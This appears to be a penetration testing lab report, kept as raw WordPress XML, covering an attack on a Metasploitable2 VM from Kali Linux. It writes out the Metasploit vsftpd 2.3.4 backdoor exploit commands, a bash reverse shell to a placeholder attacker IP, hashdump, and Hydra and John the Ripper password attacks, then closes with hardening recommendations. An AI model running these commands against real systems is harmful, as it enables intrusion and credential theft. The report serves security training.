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Penetration Testing Report - Metasploitable2 Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>To identify, exploit, and document vulnerabilities in a controlled lab environment using Metasploitable2 and Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Target: Metasploitable2 VM</w:t>
        <w:br/>
        <w:t>Attacker: Kali Linux VM</w:t>
        <w:br/>
        <w:t>Network: Local lab environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kali Linux, Metasploit Framework, Hydra, John the Ripper, Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Identified target IP using netdiscover.</w:t>
        <w:br/>
        <w:t>Command: netdiscover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Performed port scanning using Nmap.</w:t>
        <w:br/>
        <w:t>Command: nmap -A &lt;target_ip&gt;</w:t>
        <w:br/>
        <w:t>Observed open ports: 21 (FTP), 22 (SSH), 80 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Exploitation (Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Used vsftpd 2.3.4 exploit.</w:t>
        <w:br/>
        <w:t>Commands:</w:t>
        <w:br/>
        <w:t>msfconsole</w:t>
        <w:br/>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
        <w:br/>
        <w:t>set RHOST &lt;target_ip&gt;</w:t>
        <w:br/>
        <w:t>exploit</w:t>
        <w:br/>
        <w:br/>
        <w:t>Result: Gained shell access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Established reverse shell for persistent access.</w:t>
        <w:br/>
        <w:t>Command:</w:t>
        <w:br/>
        <w:t>nc -lvnp 4444</w:t>
        <w:br/>
        <w:br/>
        <w:t>On target:</w:t>
        <w:br/>
        <w:t>bash -i &gt;&amp; /dev/tcp/&lt;attacker_ip&gt;/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Commands executed:</w:t>
        <w:br/>
        <w:t>sysinfo</w:t>
        <w:br/>
        <w:t>hashdump</w:t>
        <w:br/>
        <w:br/>
        <w:t>Extracted system details and password hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Used Hydra for SSH brute-force.</w:t>
        <w:br/>
        <w:t>Command:</w:t>
        <w:br/>
        <w:t>hydra -l msfadmin -P rockyou.txt ssh://&lt;target_ip&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>Used John the Ripper to crack hashes:</w:t>
        <w:br/>
        <w:t>john hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Social Engineering (Simulation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Created a phishing demo page.</w:t>
        <w:br/>
        <w:t>Educated users on detecting phishing attempts.</w:t>
        <w:br/>
        <w:t>(No real attack performed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Malware Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Performed static and dynamic analysis on a safe sample.</w:t>
        <w:br/>
        <w:t>Used sandbox environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Applied updates, disabled unused services, configured firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Weak credentials</w:t>
        <w:br/>
        <w:t>- Outdated services</w:t>
        <w:br/>
        <w:t>- Open ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- Use strong passwords</w:t>
        <w:br/>
        <w:t>- Update software regularly</w:t>
        <w:br/>
        <w:t>- Close unused ports</w:t>
        <w:br/>
        <w:t>- Enable firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The system was vulnerable to multiple attacks. Proper security measures can significantly reduce risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots Section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Insert screenshots for:</w:t>
        <w:br/>
        <w:t>- Nmap scan</w:t>
        <w:br/>
        <w:t>- Metasploit exploitation</w:t>
        <w:br/>
        <w:t>- Shell access</w:t>
        <w:br/>
        <w:t>- Password cracking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